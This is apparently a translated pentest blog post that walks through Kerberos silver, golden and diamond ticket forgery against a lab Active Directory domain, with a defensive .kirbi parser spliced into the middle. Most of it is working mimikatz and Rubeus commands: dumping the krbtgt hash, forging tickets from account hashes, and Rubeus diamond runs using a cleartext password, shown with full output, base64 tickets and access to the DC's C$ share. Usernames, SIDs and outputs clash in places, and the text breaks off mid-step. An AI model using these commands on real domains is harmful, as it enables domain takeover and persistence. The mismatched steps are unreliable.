Internal Network Penetration: Silver / Golden / Diamond Tickets

admin, 2022-07-12 21:44:39, 492 views, 17,860 characters, reading time 59 min 32 s


1. Silver Tickets

Principle

In step 5 of Kerberos authentication, the client sends a request carrying the ST (service ticket) and its authenticator to a service on the server. When the server receives the request, it decrypts the ST with its own key, obtains the session key, and uses that session key to verify the client's identity; if verification succeeds, the client is allowed to access the requested service on the server.

A silver ticket forges the TGS (service) ticket, so no interaction with the domain controller is needed. It is built from the hash of the service account being accessed, not from the krbtgt hash. One point to note: a forged silver ticket does not carry a PAC signed by the KDC, so if the target host is configured to validate the KDC PAC signature, the silver ticket will not work. A silver ticket only grants access to the specified service.


The krbtgt hash needs to be dumped:

mimikatz log "lsadump::dcsync /domain:test.local /user:krbtgt"

Find the SID:

whoami /user

Get the domain name:

net config workstation

Preparation

1. Domain name: nami.com

2. SID: S-1-5-21-1332701932-261370409-2888687086-500

3. Target server name: WIN-A7DM9L6CVHH.nami.com

4. Service to use: cifs

5. NTLM hash of the service account: a6f9a989c9fad5637b1e1e941286da19

6. Username to forge: tset

mimikatz.exe "kerberos::golden /domain:nami.com /sid:S-1-5-21-1332701932-261370409-2888687086 /target:WIN-A7DM9L6CVHH.nami.com /service:cifs /rc4:a6f9a989c9fad5637b1e1e941286da19 /user:testa /ptt" "exit"

mimikatz output:

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /domain:nami.com /sid:S-1-5-21-1332701932-261370409-2888687086 /target:WIN-A7DM9L6CVHH.nami.com /service:cifs /rc4:a6f9a989c9fad5637b1e1e941286da19 /user:testa /ptt
User      : testa
Domain    : nami.com (NAMI)
SID       : S-1-5-21-1332701932-261370409-2888687086
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: a6f9a989c9fad5637b1e1e941286da19 - rc4_hmac_nt
Service   : cifs
Target    : WIN-A7DM9L6CVHH.nami.com
Lifetime  : 2022/7/10 19:27:16 ; 2032/7/7 19:27:16 ; 2032/7/7 19:27:16
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'testa @ nami.com' successfully submitted for current session

mimikatz(commandline) # exit
Bye!

List the tickets:

Rubeus.exe klist

Action: List Kerberos Tickets (Current User)

[*] Current LUID : 0x67e95

  UserName                 : win7
  Domain                   : NAMI0
  LogonId                  : 0x67e95
  UserSID                  : S-1-5-21-1332701932-261370409-2888687086-1602
  AuthenticationPackage    : Kerberos
  LogonType                : Interactive
  LogonTime                : 2022/7/9 18:51:29
  LogonServer              : WIN-A7DM9L6CVHH
  LogonServerDNSDomain     : NAMI.COM
  UserPrincipalName        : win7@nami.com

    [0] - 0x17 - rc4_hmac
      Start/End/MaxRenew: 2022/7/10 19:27:16 ; 2032/7/7 19:27:16 ; 2032/7/7 19:27:16
      Server Name       : cifs/WIN-A7DM9L6CVHH.nami.com @ nami.com
      Client Name       : testa @ nami.com
      Flags             : pre_authent, renewable, forwardable (40a00000)


Access the CIFS service on the DC:

C:\Users\win7.NAMI0>dir \\WIN-A7DM9L6CVHH.nami.com\c$
 驱动器 \\WIN-A7DM9L6CVHH.nami.com\c$ 中的卷没有标签。
 卷的序列号是 1EDD-1C0F

 \\WIN-A7DM9L6CVHH.nami.com\c$ 的目录

2022/03/22  22:20         1,345,536 msf.exe
2016/07/16  21:23    <DIR>          PerfLogs
2022/03/22  21:05    <DIR>          Program Files
2016/07/16  21:23    <DIR>          Program Files (x86)
2022/03/22  23:06             7,168 shell3.exe
2022/03/22  21:03    <DIR>          Users
2022/03/22  23:35    <DIR>          Windows
               2 个文件      1,352,704 字节
               5 个目录 51,494,420,480 可用字节


After running Rubeus.exe purge, the tickets are cleared:

Rubeus.exe purge

[*] Action: Purge Tickets
Luid: 0x0
[+] Tickets successfully purged!

C:\Users\win7.NAMI0\Desktop>dir \\WIN-A7DM9L6CVHH.nami.com\c$
拒绝访问。

2. Golden Tickets

Principle

A golden ticket forges the TGT, which belongs to step 3 of Kerberos authentication. After authentication succeeds, the AS encrypts the TGT with the krbtgt hash and returns it to the client. If you know the password hash of the krbtgt account, you can forge a TGT for any user directly, so no AS-REQ/AS-REP exchange with the domain controller takes place at all.


Preparation

1. Domain name: nami.com

2. Domain SID: S-1-5-21-1332701932-261370409-2888687086-502

3. Hash of the domain's krbtgt account: 5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37

4. Arbitrary username to forge: testb

Run mimikatz to create the golden ticket:

mimikatz.exe "kerberos::golden /user:Administrator /domain:nami.com /sid:S-1-5-21-1332701932-261370409-2888687086 /aes256:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37 /ticket:Administrator.kiribi" "exit"

mimikatz output:

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::ptt Administrator.kiribi

* File: 'Administrator.kiribi': OK

mimikatz(commandline) # exit
Bye!



mimikatz.exe "kerberos::ptt Administrator.kiribi" "exit"

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.1.1

Action: List Kerberos Tickets (Current User)

[*] Current LUID : 0x67e95

  UserName                 : win7
  Domain                   : NAMI0
  LogonId                  : 0x67e95
  UserSID                  : S-1-5-21-1332701932-261370409-2888687086-1602
  AuthenticationPackage    : Kerberos
  LogonType                : Interactive
  LogonTime                : 2022/7/9 18:51:29
  LogonServer              : WIN-A7DM9L6CVHH
  LogonServerDNSDomain     : NAMI.COM
  UserPrincipalName        : win7@nami.com

    [0] - 0x12 - aes256_cts_hmac_sha1
      Start/End/MaxRenew: 2022/7/10 20:12:25 ; 2032/7/7 20:12:25 ; 2032/7/7 20:12:25
      Server Name       : krbtgt/nami.com @ nami.com
      Client Name       : Administrator @ nami.com
      Flags             : pre_authent, initial, renewable, forwardable (40e00000)

    [1] - 0x12 - aes256_cts_hmac_sha1
      Start/End/MaxRenew: 2022/7/10 20:12:42 ; 2022/7/11 6:12:42 ; 2022/7/17 20:12:42
      Server Name       : cifs/WIN-A7DM9L6CVHH.nami.com @ NAMI.COM
      Client Name       : Administrator @ nami.com
      Flags             : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)


C:\Users\win7.NAMI0>dir \\WIN-A7DM9L6CVHH.nami.com\c$
 驱动器 \\WIN-A7DM9L6CVHH.nami.com\c$ 中的卷没有标签。
 卷的序列号是 1EDD-1C0F

 \\WIN-A7DM9L6CVHH.nami.com\c$ 的目录

2022/03/22  22:20         1,345,536 msf.exe
2016/07/16  21:23    <DIR>          PerfLogs
2022/03/22  21:05    <DIR>          Program Files
2016/07/16  21:23    <DIR>          Program Files (x86)
2022/03/22  23:06             7,168 shell3.exe
2022/03/22  21:03    <DIR>          Users
2022/03/22  23:35    <DIR>          Windows
               2 个文件      1,352,704 字节
               5 个目录 51,494,420,480 可用字节

3. Diamond Tickets

Principle

Both golden tickets and diamond tickets require the krbtgt key. A golden ticket attack forges a TGT from scratch, whereas a diamond ticket attack relies on the ability to take a genuine TGT requested from the domain controller, decrypt it, and re-encrypt it.

Preparation

1. The domain's krbtgt hash

2. The username and password of a current domain user

3. The domain name

4. The domain controller's name

Assume the krbtgt key has already been obtained:

krbtgt: 5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37

Create a diamond TGT using a domain user's username and password:

Rubeus.exe diamond /krbkey:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37 /user:win7 /password:admin@7 /enctype:aes /domain:nami.com /dc:WIN-A7DM9L6CVHH.nami.com /ticketuser:thor /ticketuserid:1104 /groups:512

Output:

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.1.1

[*] Action: Diamond Ticket

[*] Using domain controller: WIN-A7DM9L6CVHH.nami.com (10.0.20.16)
[!] Pre-Authentication required!
[!] AES256 Salt: NAMI.COMwin7
[*] Using aes256_cts_hmac_sha1 hash: 052F11E5B96B8E8699FF99E32E6BF2A4005C8B31FDD67DD88F8F9F08EBD65F02
[*] Building AS-REQ (w/ preauth) for: 'nami.com\win7'
[*] Using domain controller: 10.0.20.16:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIE+jCCBPagAwIBBaEDAgEWooIEDzCCBAthggQHMIIEA6ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA88wggPLoAMCARKhAwIBAqKCA70EggO5lnP9C/TjjQvkCaRG 9YQuorVlVI7ZBcAgFbo7W5Wq2g8P44QYX8G0dtTOwJJ3xkujzCnO4jLtsvvSG35ph0xfxrzof28AYG6K 1qjiyTQZe2h9fBoWHRzf78jGQHc1Z/fMpwbtt0cr76g5ArbTGsW3jgNMoz34pEuxv/39H0TrtpNAw7Ih FXHCI8gfMrw8H3Vo4fVFsWiHaub5djsBx4g6Yj0WpjLrNeX6tY8ovFNA9E2CLNqL+YVLc+29IwMlz0m/ /b8pE+2KZDzhUWZ19kQjqD8wGs54Zro7jPlOqD51OYGvhllhpuDtOlSk+2+fiZMkb81eYe/3WCyzcWd5 ehn3Ut5IQzelrt2NWM4mZOcXpTEWno1YSC8QhexN4B17y2apILXVHe1u7w1TSG7U1L1ONet5lhW3sObH huYzPC7k1Sb3OH0rUdv20m75mfgXC51g3yT2FWJlwbetPJl3VRWiiM3grXC3St1BAVFFzynui9197Kad j8ZsAk3+6kOJvVvzBlGgR1CIXyOUGQH9EJ3fGuqrEBc5t+SjoZhVpCv8S2bbpav1yJYcE6UTDrlGlssj qHQK3kJMqmDz7iyYS1z7yH7DDDY/UACiIlUG4hvkv2HP5NU9I2ZQzY+5xtSmTW+bxED0tx+nj4XMcJeU +NUImXb1+dY/Fb6XYZred3OpR16wj4CbB65Zk6ze3naVnqm1z4IKiavi6nqkylwMmmBZaBP5HFTXQGyc mtec+smV3MmsBUiLCiOz12v2apDvUYS7gYiHZnD819F+u8K4eL8UBxLivt5dM+JzWcZL/x5NGlqvwckc rW6ARmgEM4PzjZ19LnvkmxlGfVT5P/8Dd5BsGHByHHNu2feM8kwXdxJn5KPXGSxJcRdCqGiLXH4wTo/5 kOKO9QEX0mEfe7R598Y1QAoC4n4VfLC5KhOm3KN5dCEFxynqDYQYOPfyWduAfVre90yxP4S/aKRbHHVn Rmq+iNzs9fJZavQLFOYnWWIgvsBk6Jm9WUeFqr/SHPnTxzkmblCjFi/H+pZSAg+4VkdjP+VGCIJGhKtF sxEcquf+JUb2ttARQb1c9OyGTbC7pJfzz7tp33wS21bzXiK3TsJ8NgKT9pBt0qOTqx5DkWXqKu8mpPYJ iYyxAjpRlaOO/tVY+0JZIF7PKVjT6xsLPlNfq5ocBBPrXrCXSPL8qGDCHUjEKrYgd1Khs/ToEXgmoKpm vNzAy4XDdIOdzZChpgwbYcS0gZI9YriO6C1xQNkSQgQp5d4MWNF7NVijgdYwgdOgAwIBAKKBywSByH2B xTCBwqCBvzCBvDCBuaArMCmgAwIBEqEiBCBEtEF4ifDsQ/GCwfhSOUphHOXJjPoaY/hIlQ8VrKL36aEK GwhOQU1JLkNPTaIRMA+gAwIBAaEIMAYbBHdpbjejBwMFAEDhAAClERgPMjAyMjA3MTAxMDA5MDJaphEY DzIwMjIwNzEwMjAwOTAyWqcRGA8yMDIyMDcxNzEwMDkwMlqoChsITkFNSS5DT02pHTAboAMCAQKhFDAS GwZrcmJ0Z3QbCE5BTUkuQ09N
[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT
[*] base64(ticket.kirbi):
doIE6jCCBOagAwIBBaEDAgEWooID/zCCA/thggP3MIID86ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA78wggO7oAMCARKhAwIBA6KCA60EggOpfzZJAr20ictB3k0d wW1Rf4Cf+zYcVKwy2nMslhq5dZE6fDNSo3uvFQitPagJd+sXp6TvOIbjYADnaM/dG0+ZbUAbAENDWtcF vnCFp84wfr/cQOuE/cs4qkfS2HjetSiZASuLBo/rvsHzKhjqmvzilVwdnwB8E863O8XKmFi6qYFmZbj0 JQyR5wW0f/GHFkK56yocOuFzclGlSuIF0Y4OglBWRwj76zZAvl4rAZ8iBeq4nHNptTAM1xF2OTrFwpqs Px5oewPrMrO2+DF/nAzwNDQ2skgeoCRqRMWmSx+bS2QkWF0kWAywUhbc1beS6AsfrBTSzZGZFYG9HGmE dnAk1vH8si2fX+GNvOWInl5hFk7bd+oCtebAMOAbnAHgHBoMsoirBvFzv3E0EUl32+skNwu6KMuQExwJ r/4fZOsSOoCQpF5KBDgclbEW7q0y/D5Ru+6idC2TgWrRDz+1Jmpyi+LVsYJ/xH65kP73hVsj+cUTPQRu snAmo8aAd0Cnv8M7AKlLk77d4nxnWFtWyohTQQ6/yb3eaXuJWYDJhnzvuF2+j1IeMssUaOoB7SC38d9o KRGWzl7der+iYBoGateapkOx51YUCabec5k7KkLE46OYSUBlJw3I7A/ZjmBr6AG8YqOwlCAmMJA3xuqZ +oviKtKfu8O4fxJ82samGPBhwkEObNh4nh4HHIfkEn729y6GxWEHYIkkNjnBsxULQa32aNr3pXD4Jhqb daofS0a4p9n1XvySs6wwLnzlq5Ce2cYn9NPE9Ag+Ov9yEirVpgUf2FcqJYtqnTD+fR7PQ+OW0QjSohpP IdDZkp9HvYwqstwNXuGFcFxOKtQDFxUH/IZNb28f0cdZny/ouduusHEjXHv2CzIW3eNlDxJ2YC5TDLdz U9evIpA/crdSsXAIX/3s7TR5TIFc0saw2JmnJViccPEC8gHLS1mocKGxSvNGOMNruQY97198dggoGEOT paMsyjTC9b77nP7MJh4wC2IvjjpcvGLhLl4HAAX9YYlgJ5+SwFEWMSnd26VIK916XrkCIiqvw9mi/xfb Qgfoy4sm1+CdLCuZcfgBGOPAq8dZTMbo1Wfv5GzPXePZWGEAh8D9b+ELrC+GPmLWXCfyX0cB1aashgFR 1PE2p0E9m26kzJ+67oBOwYyiG//je13ugrtK/yu2KiHk2r9RRcMUM0A6GI2ypwVPWMAoj87lKPuN0C6L eTz6NI9SA/Z6CxsxFn6l6waL2uTNdUZpQqOB1jCB06ADAgEAooHLBIHIfYHFMIHCoIG/MIG8MIG5oCsw KaADAgESoSIEIES0QXiJ8OxD8YLB+FI5SmEc5cmM+hpj+EiVDxWsovfpoQobCE5BTUkuQ09NohEwD6AD AgEBoQgwBhsEdGhvcqMHAwUAQOEAAKURGA8yMDIyMDcxMDEwMDkwMlqmERgPMjAyMjA3MTAyMDA5MDJa pxEYDzIwMjIwNzE3MTAwOTAyWqgKGwhOQU1JLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsITkFNSS5D T00=
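The second base64 blob above is the re-encrypted diamond TGT as a .kirbi (a Kerberos KRB-CRED message). mimikatz and Rubeus write the enc-part of that message with etype 0, so the KrbCredInfo inside it (client principal, realm, service, validity window, session key, ticket flags) is stored in the clear, while the ticket body itself, including the modified PAC, stays encrypted under the krbtgt key. The following parser is an added example and is not code from the page, mimikatz or Rubeus; it walks the DER by hand (no asn1 library) and, as a constructed sample, takes the unencrypted EncKrbCredPart cut out of the diamond-ticket .kirbi printed above. A defender who finds such a file on disk can read which principal the ticket was minted for and how long it is valid without any key material.

```python
"""Read the cleartext KrbCredInfo out of a mimikatz/Rubeus .kirbi (KRB-CRED).
Added example; hand-rolled DER walker, nothing from the page's tools."""
import base64
from datetime import datetime

# Constructed sample: the EncKrbCredPart (APPLICATION 29) at the tail of the
# diamond-ticket .kirbi shown on this page. The encrypted Ticket that precedes
# it in the file is left out; this part is etype 0, i.e. not encrypted.
SAMPLE_CRED_PART_B64 = (
    "fYHFMIHCoIG/MIG8MIG5oCswKaADAgESoSIEIES0QXiJ8OxD8YLB+FI5SmEc5cmM+hpj+EiVDxWs"
    "ovfpoQobCE5BTUkuQ09NohEwD6ADAgEBoQgwBhsEdGhvcqMHAwUAQOEAAKURGA8yMDIyMDcxMDEw"
    "MDkwMlqmERgPMjAyMjA3MTAyMDA5MDJapxEYDzIwMjIwNzE3MTAwOTAyWqgKGwhOQU1JLkNPTakd"
    "MBugAwIBAqEUMBIbBmtyYnRndBsITkFNSS5DT00="
)

# TicketFlags bit positions (RFC 4120 5.3; bit 15 is the MS name_canonicalize flag)
FLAG_NAMES = {1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy",
              5: "may_postdate", 6: "postdated", 7: "invalid", 8: "renewable",
              9: "initial", 10: "pre_authent", 11: "hw_authent",
              12: "transited_policy_checked", 13: "ok_as_delegate",
              14: "anonymous", 15: "name_canonicalize"}


def der_read(buf, pos=0):
    """Decode one DER TLV at pos -> (tag class, tag number, payload, end offset)."""
    tag = buf[pos]
    number = tag & 0x1F
    if number == 0x1F:
        raise ValueError("high tag numbers are not used by Kerberos")
    pos += 1
    length = buf[pos]
    pos += 1
    if length & 0x80:                      # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated DER element")
    return tag >> 6, number, buf[pos:pos + length], pos + length


def der_children(value):
    """All TLVs directly inside a constructed payload."""
    out, pos = [], 0
    while pos < len(value):
        cls, num, val, pos = der_read(value, pos)
        out.append((cls, num, val))
    return out


def inner(value):
    """Payload of the single TLV wrapped by an EXPLICIT tag (Kerberos tags every field)."""
    return der_read(value)[2]


def fields(value):
    """Map [n] context tag -> payload for one SEQUENCE of tagged fields."""
    return {num: val for cls, num, val in der_children(value) if cls == 2}


def principal(value):
    """PrincipalName -> 'part/part' string (name-type is ignored here)."""
    parts = der_children(inner(fields(inner(value))[1]))
    return "/".join(v.decode() for _, _, v in parts)


def ktime(value):
    """KerberosTime is a GeneralizedTime such as 20220710100902Z."""
    return datetime.strptime(inner(value).decode(), "%Y%m%d%H%M%SZ")


def kflags(value):
    """BIT STRING -> (hex as klist prints it, list of set flag names)."""
    bits = inner(value)                    # first byte = unused-bit count
    raw = int.from_bytes(bits[1:], "big")
    width = 8 * (len(bits) - 1)
    names = [FLAG_NAMES.get(i, f"bit{i}") for i in range(width) if raw >> (width - 1 - i) & 1]
    return f"{raw:0{width // 4}x}", names


def parse_cred_info(value):
    """One KrbCredInfo: everything needed to present the ticket later, in the clear."""
    f = fields(value)
    key = fields(inner(f[0]))
    hexflags, names = kflags(f[3])
    start, end, renew = ktime(f[5]), ktime(f[6]), ktime(f[7])
    return {"key_etype": int.from_bytes(inner(key[0]), "big", signed=True),
            "key_len": len(inner(key[1])),
            "client": f"{principal(f[2])}@{inner(f[1]).decode()}",
            "service": f"{principal(f[9])}@{inner(f[8]).decode()}",
            "flags_hex": hexflags, "flags": names,
            "start": start, "end": end, "renew_till": renew,
            "lifetime_hours": (end - start).total_seconds() / 3600,
            "renew_days": (renew - start).total_seconds() / 86400}


def load_kirbi(der):
    """Accept a whole KRB-CRED (APPLICATION 22) or just its EncKrbCredPart (APPLICATION 29)."""
    cls, num, value, _ = der_read(der)
    if (cls, num) == (1, 22):
        enc = fields(inner(fields(inner(value))[3]))          # [3] enc-part -> EncryptedData
        if int.from_bytes(inner(enc[0]), "big", signed=True) != 0:
            raise ValueError("enc-part is really encrypted; the session key would be needed")
        cls, num, value, _ = der_read(inner(enc[2]))            # [2] cipher holds the cleartext part
    if (cls, num) != (1, 29):
        raise ValueError("not a KRB-CRED or EncKrbCredPart")
    infos = inner(fields(inner(value))[0])                       # [0] ticket-info, SEQUENCE OF
    return [parse_cred_info(v) for _, _, v in der_children(infos)]


def load_sample():
    return load_kirbi(base64.b64decode(SAMPLE_CRED_PART_B64))


if __name__ == "__main__":
    for info in load_sample():
        for k, v in info.items():
            print(f"{k:>15}: {v}")
```

On the sample this yields client thor@NAMI.COM, service krbtgt/NAMI.COM@NAMI.COM, an AES256 (etype 18) session key, flags 40e10000 and a 10-hour lifetime with a 7-day renewal window, matching the klist output further down. What it cannot show is the /groups:512 change, because the PAC lives inside the encrypted ticket; that is exactly why a diamond ticket looks like an ordinary TGT to anyone without the krbtgt key.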




Create a diamond TGT using the tgtdeleg trick:

C:\Rubeus>Rubeus.exe diamond /krbkey:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37 /tgtdeleg /ticketuser:thor /ticketuserid:1104 /groups:512

Output:

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.1.1

[*] Action: Diamond Ticket

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/WIN-A7DM9L6CVHH.nami.com'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: BzaMDaTaD6S9eF3ZYpZznQGqHim4GrZNG3N/1zyaubA=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
doIE+jCCBPagAwIBBaEDAgEWooIEDzCCBAthggQHMIIEA6ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA88wggPLoAMCARKhAwIBAqKCA70EggO5pe4JhXrlmSbGCz+w 1O1L1B0XEbFDJUO+8DbnCn3MT6P/tIt38Ly+Zrz8KWnhrRKMOqTfiwAaaQ4F/dhydnmbqEz79zgWf0Ie Fiu5ictNEUgNy2qR0WO4MOOiRfInPoWGXHs+aJW/rIEjT6y7QudUGhzLToBq3LZvZiI6JRo+Rk4NvPs3 E5S1LeSbwigxtrIgRYXV0O3qG0LMIlEbGzJjj71ZMMQZBoBY9ARCN4KWz6bsLomOqAPsaQzyHpPuoFmQ Uap5Mf3/p8gSj4zXdRiGz+4R3Mw2av83uos4bY5N4twSX6Tz8vra6hap2weEpaPFQJZrSriBQLpB0+em Kz2dRMLZU6oJqkZjvNxHtmq9fo3HebvjlXdT8k0Ww4jedFBrN5eQyezK6a55nr4R5IawK4a0wxwnnAmo J46kusBuqFYe4K/dqmuWAOaPUXIydF8WqlieSJiw5a97c3ZAJ/4AThFZnmO9hBX5GuT4oa+NowW8Vipz EmdyTZVujVcWnk5wlgvYiSZJP+ooY2B5z09FEZGWJJnnI1SA+yER2Y+vNtJ+vWxNhBYWdOboX137osmO 3LrPHUcVvxDV4n+7ml1BMa0FXiMmxwPptmht1DhV/7CdJBIi68dnnYLIXdLghqeYixlIc8H+gUHUEykg 5lmQ8iDgV9vKOYVI6uk7LERO8DkO6NnAswK4YpA2XGZiSdZqWgUYnNKRMjgF+lPski8pmE8VUQXP2h5t NBSvQrrivUs/8pAppETkXkLjv3xkIlzgEOwdl3gbcUDpPnGaT41YO/vrwymugRciuzfsMiwspV96Cith apcBahSxo7AA7PgMab9pOvYBnnxI1z0sPD7QhweXsf3Uwoz3Qy7xPyWZwjqdJ+uTPVvYLJtqahQ2kk2X sBESFzYlG8brnVDFORM8XaVI2+hCRgGj1uy/+3EPo8v+fMpt1a/jeS1/vfm8IcUBV9HpBVbdLp4SGoui lp9bWkhr+Bd19CwHJjqZfNBoJqfRd6TEwgKxWtjXWE28rHrqCKrm0brozF8j7EGCmzTZ3MFiQj/faMM2 yRMrlboD/in9fJiKbaXehlpE7qvSbpiANyqabdZRB/C4PAFtbf5a8xP2dmAt2nbKtxh3KLwi7kjgGI// 9vLJEwgx1No06DONFhKlP3WhoJ5VYDPfNSv8PKwYmrSKBGCmeiJ7vgpY+Q5/gtyNAj2j6kyX6B7vOLA7 ZTSskmNjuYAOYRhai6sGtvp0t+DIiSX1S+DYKyyq3aYNDvH6AaGSmpujgdYwgdOgAwIBAKKBywSByH2B xTCBwqCBvzCBvDCBuaArMCmgAwIBEqEiBCD/fE5Z49iKW+LbijggS7K44DP9DgIy9Rss1PIWjpTKoaEK GwhOQU1JLkNPTaIRMA+gAwIBAaEIMAYbBHdpbjejBwMFAGChAAClERgPMjAyMjA3MTAwOTQ1NTBaphEY DzIwMjIwNzEwMTk0MTUzWqcRGA8yMDIyMDcxNzA5NDE1M1qoChsITkFNSS5DT02pHTAboAMCAQKhFDAS GwZrcmJ0Z3QbCE5BTUkuQ09N
[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT
[*] base64(ticket.kirbi):
doIE6jCCBOagAwIBBaEDAgEWooID/zCCA/thggP3MIID86ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA78wggO7oAMCARKhAwIBA6KCA60EggOpSsngeghif/mcTl6M NYsPa2KZAP96iM+zjJtUi0Un9nK+uWmyWP7/tqurYDMX4UCuvsKlNY+hoU2el5GIntt4MfL0Qtj9805N qjpb2ta7dhPkptfEtobJXcaWpA1Yh8wExlteZxZDd6GdZN4lncQgRTN43IynDFMR8GiH+L7WcooqVaUm Lev9kjEnNVBFCAtT3qFhG6qgFdVgz6gg+ByC45QrLI8auJE3aVaKsfiSgm+GHii5v5VoMFT9/4mxfbLn cfLlpJR6mTDXYSqK/xCVuQeUqhmvE3/4sJ1UdAWWu/2TvuvRWN1TdzxvVW9HXzq8i+pK48MZaym8xBa6 pio1oJ+3ZqoU5UuH+tXXr/z+Iex32TsvJnX5vlUj7mOU1AsiV56axG/To05y15SfTn0eIqE2QBpcfvYs saqpVkoCHFeENkd36E0akHijmQA1OLJeJA0zkighHtsWnMLdJWUXSI5zZH0lOSsVssJ248OBqIaKOdnf 1bThgMLcvXTvKjxGYoiB+f1t8Catbv9cNqvKbq9/dlSf9nBZMGy60QFZNuqMqgwRrAXpLmiCCxZJtbIE vR38oJvHbkP75ugfMLsDrw5Ctl04lzRo+Big8Z+SDBUOtuGngnELdgCQqtqh7GiZtaFy4xQupzBqvhrG 2BY3I85IoD++5q8VrtKOI7GfD9GaDUZvjyA+bxfN7EXKJi9eOqt7mkmusz5o54zHgRerhYsQ7k16k14n ZlsA7ufT97Z1osvGPD7lAcA6b3SohY3IhrUHxwccFRNMLabfSHzT1TYlaT/+yByMA+eulPa9RE8yFDWn A2dEodb8EW06JWzHpI27R7dCrm6X11QOBT2gWFdMzm2klAjGfJDkD9doBADoqqwdIxwT2aTI32UHjlQd lsTwtfY0/wzCCAkwKQAAVxf93avCYDXh2y75Rcp5MvkCJJu3Z2SoYWRgYk2M3JcMTWGAyZJCPx8mQShF nkdgNGgnA2+ISVMUOMZsREv2ev8Jslzl4ii+Xqnwl1+fNYcMjdhBZmY2hYNENpTpxC/nBQcNftPeDniC vOwR7lRTE+tW39ylVRWlYV5y6SPyslVYWE+PfRauGcOAmZZmJNYJUCNjs3c9560zqKQEjBXQtyWJXXrq y7HZ+SFD95caxYK9cJp2YZLkjIEKUwxCjHcHvj1cA6Hy3TJTAgvxoxpPrYCDyRhG8OZ4RilZ8h7aOxMR 94mtBxnQNFbDAax1I6IHhWrc/D0pXZhvaaOB1jCB06ADAgEAooHLBIHIfYHFMIHCoIG/MIG8MIG5oCsw KaADAgESoSIEIP98Tlnj2Ipb4tuKOCBLsrjgM/0OAjL1GyzU8haOlMqhoQobCE5BTUkuQ09NohEwD6AD AgEBoQgwBhsEdGhvcqMHAwUAYKEAAKURGA8yMDIyMDcxMDA5NDU1MFqmERgPMjAyMjA3MTAxOTQxNTNa pxEYDzIwMjIwNzE3MDk0MTUzWqgKGwhOQU1JLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsITkFNSS5D T00=




Import the ticket with ptt:

